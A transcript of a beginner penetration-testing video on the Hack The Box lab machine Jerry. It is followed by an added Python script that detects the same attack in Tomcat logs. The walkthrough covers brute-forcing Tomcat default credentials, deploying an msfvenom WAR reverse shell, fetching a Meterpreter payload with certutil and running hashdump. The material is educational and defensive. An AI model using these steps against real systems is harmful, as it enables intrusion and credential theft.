Pentesting for n00bs: Episode 5 - Jerry
Key Takeaways
This video covers pentesting for beginners, focusing on exploiting a Windows machine on Hack the Box, using tools like Burp Suite, Metasploit, and Python, and demonstrating techniques such as brute-force attacks, reverse shells, and file transfers.
Full Transcript
Hello, hello, hello. Welcome to another episode of Pentesting for n00bs. You are now on episode 5. If you've made it this far, congratulations, you are a determined individual. So today's machine is going to be Jerry. Jerry lives at 10.10.10.95. So if you're not already on this site, go ahead and go to hackthebox.eu, go over here to your All machines, scroll down to Jerry and hit the play button. Once you've got that all set up, let's go ahead and get Jerry scanning. So I'm gonna open up a new terminal here and we'll do our typical scan and stall, where I scan it, we'll talk about it until the scan comes back, and then we'll look at the scan. So you can go ahead and use your favorite scan method. You should know mine by now. Very straightforward here, and we'll let that run.
So let's talk about Jerry. Jerry is a Windows machine, as we can see here, and historically Jerry is one of the most rooted and easier machines on Hack The Box. We can see here that it's got twelve thousand user owns and roots, and we can see from the rest that, I mean, the next closest in this list is eight thousand, right? So by far Jerry is one of the most rooted, if not the most rooted, machines. So while it's easy, it does not mean that it does not have important lessons to teach us. The most important lesson we're going to learn today is about default credentials. Why are default credentials so bad, and why are they so common still? I run into default credentials as a pen tester all the time. On the external web, in my history, I have run into cisco/cisco on a default credential on a Cisco router leading to internal network access. I have got domain admin off of a printer with default credentials on an internal network. I've gotten reverse shells off default credentials on internal net. So default credentials can lead to some very, very bad things, and you're going to see an example of that today. On top of that, what we're gonna be doing is we're going to be doing some bash scripting, we'll do a little bit of brute
forcing. We're gonna be using Burp Suite today. There's a lot of cool tactics that I can show you that are going to just improve our learning process. On top of that, I'll talk about some manual exploitation for this machine. We'll use msfvenom, generate some shellcode, but we'll use netcat to actually get in the machine, and then we'll talk about file transfers and how to improve. So we have a lot to learn from a very, very basic box.
So let's go ahead and just take a look at the scan now. So our scan came back and 65,535 ports were filtered. That is great. Why is that great? That means we only have one port to focus on here, and that port is 8080. Now there are some situations where there might be hidden ports, like port knocking, but for a machine this easy on Hack The Box I'm not thinking that that's the path. So when we're looking at 8080, that says, hey, vulnerability for sure somewhere on 8080, that's where you're going to get in. So we've got some version information here. We could see Apache Tomcat with a JSP engine of 1.1. We can also see Apache Tomcat version number here of 7.0.88. So as we've talked about before, this is perhaps a default web page. We're getting a lot of Tomcat information here, and if it's not a default web page, why are they disclosing their server headers with service information? You know, that's just a no-no. We would write this up on a pen test report as a finding. So there are some things that we can do off the bat here. You know, my first decision is always to go to the web page and see what I'm working with, but if we do want to, we can also Google something like "Apache Tomcat 7.0.88 exploit" and see if there's any exploits out there. We could do the same for this JSP engine and see if there's any exploits for that. That would be version exploits, right? Before we do that, or, we're not actually going to get into it, before we did that my step would always be to go out to the web page just to see what's going on, and in this instance we're
working with port 8080, so we're gonna go out and we're just going to go to 10.10.10.95. You can see I have it here with the port 8080 at the end. Go ahead and hit enter, and we are brought to this Apache Tomcat page. Now this is not a good page to be leaving open, or even if it's on the internal network, but if this is on the external, this is bad. You'll find this on external networks. People will tuck it away under like /manager or /admin or whatever, because this over here on the side is what gets you into the admin panels. So you do see this a lot. This Apache Tomcat is very realistic, and if there is any sort of guessable credentials on this side of the house, oh, it's game over, and you're gonna find out why. So this would be a finding too, depending on what you're doing. If this is external, this is like, hey, why do you have this up? You know, you should put this behind a VPN so that only you can access it when you're on the internal side. Don't leave this open on the external network. On the internal side, you know, is this VLANed off? Who has access to this page? Why do they have access to this page? You don't want this easily accessible by any means.
So we're at this page and we have this Manager App over here on the side. Now we can log in with the Manager App and do some malicious things, but before we can log in here, one of the first things I do when I see a login on a login page like this with the service version, I'm going right to Google. I'm gonna say, hey Google, what's up, let's talk about Apache Tomcat default credentials, and let's see what we can pull up. First thing that comes up is GitHub, right? And we can come into GitHub, and GitHub has this wonderful list, because Tomcat has quite a few default credentials. So what we can do is we can take this list and use it in a brute force. Now there are tools out there that will do this for you. I kind of want to get a little crafty today and teach us some manual methods. I think that'll be more fun. So what
we're gonna do is we're going to fire up Burp Suite, and the new Burp Suite errors out with this Java error. Don't worry about it too much, we're not going to worry about fixing it today, I'll just work around it. So we're gonna go ahead and just click Next and Start Burp with default. Now in order to get Burp Suite working, there is this proxy here, right? And the proxy, if we go actually into the Options tab, it sits at 127.0.0.1, the home address, on port 8080, and this is how we intercept traffic. So we need to actually do that. We need to go into our little hamburger menu here and go up to Preferences, or down to Preferences, scroll all the way down, and at the very bottom is the Network Proxy. We're gonna filter all of our traffic through Burp Suite. Right now you should be set to Use system proxy settings. Go ahead and just select Manual proxy configuration, 127.0.0.1 here, port 8080 here, and click the box for Use this proxy server for all protocols. So it should look like this when it's all said and done. OK, so we'll hit OK on that and we'll test this out.
If we go back to the Apache Tomcat and we just hit enter, it shouldn't load. It should freeze here, something should just be spinning. If you look at your proxy, proxy got intercepted. What's going on? Well, what's happening here is we intercepted the request, and before we send it to the page, we have the opportunity to modify it. We can say instead of a GET request here, to put this as a POST request. We can get malicious in here. We could do all sorts of things, and this is where web app testing really becomes fun, is when we start tampering and doing certain, you know, malicious activities with these requests. But for now let's just go ahead and forward it, and you should see the page reloads. Perfect. What we're after today is this Manager App. So if we click on Manager App, and you see that, okay, it freezes on manager. Let's just forward this request and see what happens. All right, so 10.10.10.95:8080, it's asking us for credentials. Well, there's 21 or so
in that list, but one I did remember was tomcat/tomcat, so let's try tomcat/tomcat and just say OK. Now immediately this intercepts the request, and a lot of times what you'll see is you'll see a username field and a password field here, but we're actually getting this Authorization: Basic, and it looks like it's encoded with base64. You could usually tell this by the equal signs at the end, typically. So what we can do here is we can right-click on this and we can say Send to Decoder, is one option we're gonna do, and you'll see your Decoder tab lights up, right? And you come in here and you just scroll down and highlight this little area, and let's see what it's doing. We'll Decode as over here and we'll just say Base64. If we scroll down you can see it's just saying, hey, tomcat:tomcat, so username:password is what it's attempting. And let's go ahead and forward this and see what happens. Doesn't look like it worked, right? So we forwarded it and it didn't work.
OK, we could try manager/tomcat or something along those lines, and this time what we can do, intercept it one more time, we could do a couple different cool little things. One is we could say, hey, send this to Repeater, and hey, number two, send this to Intruder. So we'll see both of our tabs light up. If we look at Repeater, Repeater just repeats requests. We have the opportunity, instead of sending it in real time with a proxy, to come back over here and send the request and see what the response is. So this is where we can kind of just play with certain requests and see how the server responds. So if we hit Go on this, we can see that we got a 401 Unauthorized. So 401 means, hey, you did not get access here, right? So this set of credentials is incorrect. And OK, let's just go ahead and turn the intercept off. We'll let this go, we'll hit cancel, and then let's go ahead and try brute-forcing this, because, you know, there's 20-something here, right? 30 lines, it says. 30 lines of passwords, that's a lot of passwords. So what we'll do is let's go
into our new window, OK, and let me make this bigger, and I'm gonna use gedit because I like gedit. So let's just say gedit tomcat.txt, and what we'll do here is we will copy all these usernames and passwords and then paste them into here. Now select the space in between. Remember the format that we had, we got to put this into base64. So what we're gonna do, I guess I should explain that a little bit better, is we sent our request to Intruder. If we come into Positions here, we see that our request is sitting here. What Intruder is going to do is do a brute-force style attack based on the attack type that we select. Well, the requests are coming through in base64, so we have to put these into base64 in that format that we saw, see, username colon password. So we're gonna do the same thing now: get this set up, then we're gonna convert these to base64, and then we're gonna fire them off.
So first things first, let's go back in here. We've got this little space, copy. Let's hit Ctrl+H, that's our find and replace. Let's go ahead and just paste that space here, and what we're gonna do is we're going to just replace everything that has that kind of space with this colon. We'll Replace All, and look how easy that was. So now we've got a set list of credentials here that is actually 25 lines long, and so we're gonna save this out and we're gonna write a little bash script. So if you have never used any bash scripting, one, I recommend watching some videos on bash scripting. I've got a few on my channel. If you watch the tail end of the Linux for Ethical Hackers course, it's in there. I've got individual videos on it as well, pretty much typically the same lesson. But the importance of what you're about to see is called a for loop, and for loops are awesome. You see one-line for loops a lot, and that is very useful when it comes to pen testing. So let's break down what we're going to do. So we've got credentials in this list, right? We've got these credentials and we'll just take one for an example.
We want to convert these credentials into base64. So one way we can do that is we can just echo, and we say echo -n, and we're gonna say I want to put that, say tomcat:tomcat, right, like that, into base64. This is the command to do that, and there it is. Now if we were to decode this, this would come back out as tomcat:tomcat. OK, that's cool, but we've got a long list here in this tomcat.txt, and what we need to do is do this for everything in that list. So let's write a for loop and we'll talk through it. So I'm going to say for cred, and you can call this whatever you want, you can call it bob if you want, but for cred, it's our variable, in, and then we got to specify what the credentials are and where they're at. So every line here is going to be a credential in this loop, and I'll explain it in a little bit better detail, but we're gonna cat out this tomcat.txt, meaning we're gonna print all the lines, OK? And what's gonna happen is we're going to do something. We're going to do an echo -n for that credential and we're gonna pipe it into base64, and then we're gonna say done.
So what's happening here? A for loop means you're going to do something for everything in that instance, right? So for the first line in tomcat.txt, for the second line, for the third line, until you are completely done. So for credential, all we're saying is, hey, the first line, we're gonna call that cred, and then when that first line prints out in that cat, we're gonna put it over here in this echo command, put it through base64, and then we're gonna go back again. The second line, we're gonna call that cred, we're gonna do it again, and then we're gonna go all the way through and base64 all of these, and then it should print out and be done. Boom, look at that. OK, so you've got all the credentials that we just put through in base64 format. So what we're gonna do is just, let's copy all these here and we're gonna go back into Burp Suite. Now of course, like I said, there is a tool that's out there for
this, or you can manually type these, but with so many default credentials... most websites, or most programs, only have like two sets of default credentials, but Tomcat for whatever reason has a lot. But here we go, we're in Burp Suite. Now in order to use Intruder, we need to set up what we're going to intrude on. So here we need to set our payload parameter area. We're gonna set the position of one here, this is position one, OK? And we're saying, hey, everything here, this is what we're gonna replace. So we're gonna use a Sniper attack, and Sniper just means one, that's how you can think of it. This is just one payload that we're gonna be sending off. So if we go into the Payloads tab over here, we can just hit Paste on our list, and you can see now it's gonna fire off 25 payloads. What it's gonna do is it's going to replace the base64 that we highlighted with the base64 that's here. One other thing that we need to take off here is this URL encoding. It's going to attempt to URL-encode these characters, and in this instance, if it tries to URL-encode these equal signs, it's actually going to fail for us. So it should be noted that we're also on a free Community Edition of Burp Suite, thus it's going to be slower. The free edition is very slow, the Pro edition very fast. So we're gonna hit Start attack, and it's gonna say, hey, we're gonna slow this down just to be jerks.
And what's gonna happen here is we're going through all 25 requests, right? And you can see different status codes come through. I mean, that's what we're looking at. We're looking at two things: one, we could sort by status code; two, we could sort by the length here. Now some advanced topics or tactics: when you're running through thousands, say you're doing a username brute force and you're trying to find the one person that, you know, might have got through, you can come through, say, on our response, and you could see something in here that says like "you are not authorized to view this page". You can copy "you are not authorized" and you can paste it
down into your payload rules here, or options, and say, hey, grep on this, and then they'll have a little checkbox up here that says "you are not authorized", and it will check every time it comes through here, and then you could just sort by that. So if you click on these, you can sort by different things, right? So length is a big one. If length changes... look how significant this length is here, and you see the rest of these. Anything 400, we don't really care about. This one, 403, for whatever reason, forbidden, access denied. This one, that might be a valid set of credentials, but we don't have access to that application. This one is a valid set of credentials that does. Look at the 200 status, that means OK, and on top of it we have a 17,000 length compared to 2,000 or 3,000 here. So significant differences. But in long lists it's better to grep on something like an error and then just sort by that error with the checkboxes, to find, you know, maybe a different message that came through, as opposed to just looking for length or status codes, because you might get like a 302 redirect or something on a login or successful login.
OK, so here we've got these credentials, which these actually come out to tomcat secret, is how that played out. So this is tomcat secret, in case you are curious. OK, and so that logged us in. So let's go ahead and say no to these changes. We know for sure that we're in. So let's go to the page, and what I'm gonna do for the rest of this time, I'm gonna go ahead and turn off Burp Suite and these proxy settings, and let's just log into the Manager App with our newfound credentials. And you could base64 decode this, I was just being lazy. By the way, you could come in here and say, hey, what is this, 'cause I have no idea, I can't read this. You can easily just go to Decoder and decode that, right, and see that it's tomcat secret. OK, so from here we are now in the application itself. So if you've never been in a Tomcat application, they use something called WAR files, OK? WAR files are used
to upload here and they deploy these applications. You see manager, host-manager, examples, blah blah blah. What we can do is upload a malicious WAR file and get a reverse shell. See, there is an area here to upload a WAR file. Now, this is your first time in the application and you're new and you're like, oh man, what am I doing here? You say, OK, well, I see that there's a WAR file, I wonder if I can be malicious with that. And then you might go and say "WAR file reverse shell" or something along those lines, "WAR file exploit", and then you can see there's all kinds of articles that come through: using Metasploit to create a WAR backdoor, Apache Tomcat WAR backdoor. So this is the kind of information that we're after.
A couple of things that we see down here that help us out as well is we see that we're running on a Windows Server 2012 R2. That means that we're likely running on 64-bit, right? This is R2 server, and we get some information about the OS, that's nice. Oh, amd64 is 64-bit. So we picked up a little bit of information, hostname and IP address, so a little bit of information disclosure there as well that will help us when we're trying to make this WAR file, right? So what we're gonna use is msfvenom. There's "Tomcat WAR reverse shell msfvenom", and let's click on that here. This is good. So this "Creating Metasploit Payloads" here, this netsec.ws is good. There's a lot of cheat sheets out there for different ones. This is a very nice cheat sheet that I like to go to, as you can see I've already been to it before. You could just go down the list, like if this is a PHP site we can go to a PHP site, and I think I've showed you this before for the ASP. Same thing here, we're just using a WAR file and we're gonna generate this on our own. So let's go ahead and let's Ctrl+L, and if we see what it wants us to do, let's just, all this, copy and paste it. We'll be lazy, OK? And we'll paste it in. Now we have two options here, right? We can do the manual method, which is what we're doing, or we can do the Metasploit
method. We'll do the manual method today, but we could change the payload to a Meterpreter payload and use the exploit handler in Metasploit and get an exploit, or Metasploit reverse shell, easily. OK, so let's go back and let's just talk about what we're seeing. msfvenom, -p for payload. We are running on Java on this platform. Now we're gonna be using a jsp_shell_reverse_tcp. Notice all the underscores, not the forwards. This is getting sent all at once; this is an unstaged payload, not a staged payload. So let's go ahead and enter in the IP address that we're gonna be using. I actually don't know mine, so I'll open up a new tab really quick and do the ifconfig, or your ip a. 10.10.14.24 for me. So we're gonna be listening on our IP address, and you can listen in on the port of your choice. I will just use the standard all fours on this machine, and then we're going to generate this, and it takes just a second here.
OK, we have generated a shell.war file. That means we need to be listening on this 4444 in order for this shell to come back to us. Let's go ahead and use netcat, -nvlp. So netcat is a listener slash connector, it's a port tool, it's amazing functionality. What we're gonna be doing here is we're saying, hey netcat, I want to listen right now. And again, remember, when we're doing reverse shell, that just means somebody talks back to us. All we have to do is listen. So we're gonna be listening on all fours, OK? That's the port we're listening on. Now what's gonna happen is this is going to say we're gonna upload it, and then it's gonna try to connect back to the IP address that we supplied. So let's go ahead and browse for that WAR file. I put mine in my root folder, and there it is, shell.war. You say Deploy. We've deployed it. You can see here that it is /shell, and we've got nothing yet, but we can force this along and get that shell by going to it, and boom, look at that, it talked back to us. We are so malicious. OK, so the best thing about this
box also is whoami: authority\system right off the bat. And if we go to the users file, I remember this from a long time ago, if we say dir, actually Desktop, sorry, and we say dir, we type... you see it's flags, or it might be... is that... that's the directory. Let's go to the flags directory and then do dir, and then, two for the price of one, they actually give you both flags here. So the fact that there were people that only had... there were more root owns than there were user owns, for whatever reason. Some people just decided they didn't want the user on this machine, but both flags are sitting in there, so I think that's funny.
Anyway, we're back in here. OK, we have SYSTEM on this machine. We can do all kinds of commands and look around, right? You know, we can look at the ARP, see who we're talking to, so arp -a. We're not talking to anybody but ten - and ten dot 255. Now this really isn't useful. Again, this is just for your knowledge. It's not gonna be very useful in a Hack The Box environment like this. If you're doing like a lab environment, super useful to see who it's talking to. Same thing with netstat, same thing with the route, route print on Windows. So OK, we found our flags, this is cool, but we're still in that limited flexibility. So let's go ahead and talk about how we can improve this shell. Again, we're going to use Metasploit. We're gonna do this a little bit outside the box this time. So what I want to do is I want to create a reverse shell to this machine. We're gonna generate a new reverse shell, so we'll come into here and we'll use msfvenom like before. So we'll say msfvenom, we'll do a payload here, windows, because we know it's a Windows machine, x64, because we know it's 64-bit, and we'll just say meterpreter, and we'll try shell_reverse_tcp, and that may or may not work, so we'll try staged and unstaged here. Our LHOST again is mine, 10.10.14.26. The LPORT is going to be, let's do 5555 so we don't interfere with the all fours we're
already on, and then all we need is a file type, which is exe, and we'll put that into a shell, we'll call it sh.exe. Let that generate. On top of that, let's go ahead and go into Metasploit, and we'll say, hey Metasploit, how you doing, I want to run your exploit handler. So this should look familiar from last time. And it looks like I picked up a bad shell here, so maybe I don't know what I'm doing. So let's go into use exploit/multi/handler and let's see what the name of that is. So we'll say set payload and we'll say windows, do a tab, it's a little slow, x64, meterpreter, I think it's just maybe reverse_tcp. Yeah, it's not shell_reverse_tcp, it's just reverse_tcp. And delete that, regenerate it, sorry, and come back into here. While that's regenerating we could say options, and we'll say set LHOST, same thing we just specified, 14.26, set LPORT all fives, and now we're just going to run this and listen on it. [Music] Hmm, it said it failed to bind. Why is it failing to bind? Let's check our IP one more time. 14.24. Guys, I am screwing up so bad. OK, hopefully you're running the right IP address and you're not being like me. I have to fix this payload really quick to be 24. I've been doing the Offshore labs all week, all last week, and my IP address was a little bit different, so that's kind of why I'm getting these numbers mixed up.
OK, so we're running on this now and we are also running on the correct payload. So how do we get a file onto a Windows machine? Well, first and foremost we need to host a web server. The easiest way to host a web server is with Python. Now we could just say python -m, and we could say http... SimpleHTTPServer on 80, like this, and that's going to load up a simple HTTP server. So we're in here and now we're hosting up every single file that is in this root folder, so that's a nice thing. We've got instant access to everything that's here. We can cut it out as soon as we want to and be done. So we can go to our 10.10.14.24 and see everything that I'm hosting here,
and then as soon as I don't want to host it anymore... and you can see what's going on as well, that status, commands, awesome. Ctrl+C, I come back and it's dead. So it's just for as long as you need it. So we've got the shell now being hosted, and when we talk about collecting or transporting files on Windows, there is a tool that's on there. Now, it's starting to get picked up by Defender, but for a long time they didn't, so on assessments it still works fairly well. What we can do here, it's a built-in tool. Now everybody knows about wget for Linux. This is my idea of the quick and dirty way of doing like a wget for Windows that's not very commonly well known. So let's just go and say, we'll just put it down in the flags folder, that's fine. So we'll say certutil, certutil, if I could type, and we're gonna say -urlcache, meaning we're bringing over a file via URL. We're gonna do a -f for the file, and say, hey, I want to grab 10.10.14.24/sh.exe, and while I'm at it let's put that file in Users\Administrator\Desktop\flags, and we'll also call it sh.exe. OK, you can see it grabbed it. We could say dir just to make sure. OK, sh.exe is in here, and on top of it, if we go to our file server, you can see that sh.exe was actually retrieved from the file server.
So this is nice when you're running like a blind payload on a web server and you don't know if it's actually downloading. You could have it download something to see if you've got command execution like this and know for sure that something came through. I ran into that just this past weekend, actually. So from here we can just say sh.exe, run it, and look what happened: we now have a Meterpreter reverse shell. Now in the real world this is going to be picked up fairly easily, I would imagine, but, you know, we can obfuscate this more. But in a situation like this, or even a bad environment where they don't have good AV, something like this is not gonna get picked up at all. So this is just a nice way to show you like, hey,
we can get a Meterpreter session, and now we can just do a hashdump. You know, we have control over what we can do and we have a lot more flexibility again. So yes, it ends in Meterpreter; we went a very manual method of doing it.
So what did we learn today? We learned default credentials are very bad and can lead to very bad things. We learned that we can use some nifty little tricks in for loops and get something done very quick with some basic bash scripting. We learned how to use Burp Suite. We learned about Repeater and the proxies and Intruder, a lot of cool features in there that we'll only dive into more as we go. And we learned how to transfer files on a Windows machine to improve a shell and just, you know, get better overall. So thank you again for joining me for this lesson. Hopefully it was informative to you. If you enjoyed the lesson, please do hit subscribe, please, you know, select that bell, make sure you've got notifications turned on, and hit the like button as well. Tell a friend. We're still growing, it's been awesome, guys. Working towards that... I guess the next goal is 100k, right? We've got to work towards that, get that silver play button and really, really show off a little bit. So thank you so much for joining me, and until next time, my name is TCM, and thank you for having me. [Music]
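Added example (not part of the video or its transcript): the defender's view of the walkthrough above, flagging in a Tomcat access log the trail it leaves, namely a run of 401s on the Manager app from one source, a 403 for a valid account without the manager role, a login that follows, and a WAR upload. The log lines, addresses and the `ops` and `admin` usernames are constructed, and the parser assumes Tomcat's `common` access-log pattern.

```python
import re
from collections import defaultdict

# Constructed sample in the "common" pattern: %h %l %u %t "%r" %s %b
# 192.0.2.10 is an administrator's browser (one 401 challenge, then success);
# 198.51.100.7 walks a credential list before it gets in.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:09:00:00 +0000] "GET /manager/html HTTP/1.1" 401 2536
192.0.2.10 - ops [01/Jan/2024:09:00:04 +0000] "GET /manager/html HTTP/1.1" 200 17212
198.51.100.7 - - [01/Jan/2024:09:30:00 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - - [01/Jan/2024:09:30:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - - [01/Jan/2024:09:30:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - - [01/Jan/2024:09:30:03 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - - [01/Jan/2024:09:30:04 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - admin [01/Jan/2024:09:30:05 +0000] "GET /manager/html HTTP/1.1" 403 3446
198.51.100.7 - tomcat [01/Jan/2024:09:30:06 +0000] "GET /manager/html HTTP/1.1" 200 17212
198.51.100.7 - tomcat [01/Jan/2024:09:31:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 18004
"""

LINE_RE = re.compile(
    r'(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Tomcat's Manager and Host Manager web applications.
MANAGER_PREFIXES = ("/manager/", "/host-manager/")
# Manager endpoints that deploy a WAR (HTML form upload and text interface).
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}


def analyze(lines, fail_threshold=5):
    """Return (host, finding, detail) tuples for Manager-app abuse patterns.

    fail_threshold is the number of 401s from one source that must precede a
    success before it is reported; a normal browser login produces a single
    401 (the Basic-auth challenge), so the default leaves that alone.
    """
    failures = defaultdict(int)  # 401s per source since its last success
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed pattern
        host, user = m["host"], m["user"]
        path = m["path"].split("?", 1)[0]  # drop the query string
        status = int(m["status"])
        if not path.startswith(MANAGER_PREFIXES):
            continue
        if status == 401:
            failures[host] += 1
        elif status == 403 and user != "-":
            # Password was right, but the account lacks the manager role.
            findings.append((host, "authenticated_without_role", user))
        elif status == 200 and user != "-":
            if failures[host] >= fail_threshold:
                detail = f"{user} after {failures[host]} failures"
                findings.append((host, "login_after_spray", detail))
            failures[host] = 0
            if m["method"] in ("POST", "PUT") and path in DEPLOY_PATHS:
                findings.append((host, "war_deploy", user))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding)
```

Counting only the 401s that precede a success keeps ordinary administrator logins out of the results; in production the same three conditions map directly onto SIEM rules over the access-log fields.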
Original Description
0:00 - Introduction and box overview
2:53 - Reviewing scan results
4:34 - Exploring port 8080
6:15 - Apache Tomcat default credentials
6:50 - Configuring Burp Suite
8:05 - Discussing Burp Suite intercepts, decoder, repeater, and intruder
11:30 - Building out a default credential list
13:15 - One line for loops for the win
16:10 - Using Burp intruder to test for default credentials
20:00 - Exploring Tomcat with found credentials
21:10 - Enumerating Tomcat, generating WAR reverse shells, and getting a shell
26:14 - Discussing post enumeration, certutil file transfers, Python HTTP servers, and improving a shell
📱Social Media📱
___________________________________________
Website: https://thecybermentor.com
Twitter: https://twitter.com/thecybermentor
Twitch: https://www.twitch.tv/thecybermentor
Discord: https://tcm-sec.com/discord
LinkedIn: https://www.linkedin.com/in/heathadams
💸Donate💸
___________________________________________
Like the channel? Please consider supporting me on Patreon:
https://www.patreon.com/thecybermentor
Support the stream (one-time): https://streamlabs.com/thecybermentor
Hacker Books:
Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX
The Hacker Playbook 3: https://amzn.to/34XkIY2
Hacking: The Art of Exploitation: https://amzn.to/2VchDyL
The Web Application Hacker's Handbook: https://amzn.to/30Fj21S
Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from The Cyber Mentor · The Cyber Mentor · 51 of 60
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
▶
52
53
54
55
56
57
58
59
60